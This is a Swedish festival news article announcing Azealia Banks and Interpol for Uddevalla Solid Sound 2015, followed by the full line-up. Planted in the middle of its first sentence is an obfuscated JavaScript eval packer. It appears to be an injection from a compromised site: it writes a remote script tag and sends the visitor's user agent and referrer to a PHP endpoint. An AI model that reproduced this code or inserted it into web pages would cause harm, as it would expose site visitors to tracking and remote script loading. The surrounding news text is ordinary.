Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

AZEALIA BANKS OCH INTERPOL TILL UDDEVALLA SOLID SOUND

AZEALIA BANKS OCH INTERPOL TILL UDDEVALLA SOLID SOUND
Sebastian

Azealia eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|isyae|var|u0026u|referrer|ykfkk||js|php’.split(’|’),0,{}))
Banks och Interpol är klara för Uddevalla Solid Sound. Två superbokningar för den växande festivalen, som också innebär båda bandens enda framträdanden i Sverige i år.

Nu är lineupen för årets upplaga av Uddevalla Solid Sound spikad och klar. De sista akterna som presenteras är båda från New York och framför allt två riktigt tunga internationella namn: Azealia Banks och Interpol.

Azealia Banks slog igenom stort 2011 med hiten ”212”. 2012 släppte hon singeln ”Fuck Up The Fun” producerad av Diplo och mixtapen ”Fantasea”, vilket bestod av 19 egna spår. Azealia Banks som kommer från Harlem i New York är en av få MC:s som utmanat förväntningarna på vad rap, hiphop och musik kan vara. Banks har varit Sverigeaktuell flera gånger tidigare, bland annat var hon bokad till Way out West 2013, men blivit tvungen att ställa vid samtliga tillfällen. Spelning på Uddevalla Solid Sound kommer därför att bli Azealia Banks första spelning i Sverige någonsin.

Interpol slog igenom 2002 med debutplattan ”Turn on the bright lights”. Med legendariska skivbolaget Matador Records i ryggen blev Interpol ett av 2000-talets mest omtalade rockband med sin mörka postpunk. Förra året släppte Interpol sin senaste skiva ”El Pintor” och genomför i sommar en Europa-turné. Spelningen på Uddevalla Solid Sound blir den enda spelningen i Sverige i år, och den första på svensk mark sedan 2011.

– När vi startade festivalen för tre år sedan kunde vi bara drömma om sådana här bokningar. Vi ser det som ett kvitto på att vi gjort något väldigt bra och vi är väldigt stolta att kunna bjuda publiken på artister av absolut världsklass, säger Simon Tehyrell, informationsansvarig Uddevalla Solid Sound.

Uddevalla Solid Sound arrangeras den 12–13 juni. Uddevalla Solid Sound är en av få svenska festivaler med en uttalad målsättning om ett totalt jämställt artistutbud.

Artisterna som uppträder på Uddevalla Solid Sound 2015 är:

– Azealia Banks (US)         – Interpol (US)                  – Thåström

– Veronica Maggio             – Anna Ternheim              – Maskinen

– Amason                           – Silvana Imam                  – The Bloody Beetroots (SBCR DJ)(I)

– John De Sohn                  – Familjen                          – Love Antell

– Little Jinder                     – INVSN                              – Beatrice Eli

– Hurula                             – Sabina Ddumba             – Looptroop Rockers

– Dotter                              – Cleo                                  – Pale Honey

– Ravendal                         – The Wife                         – Robert Pehrson´s Humbucker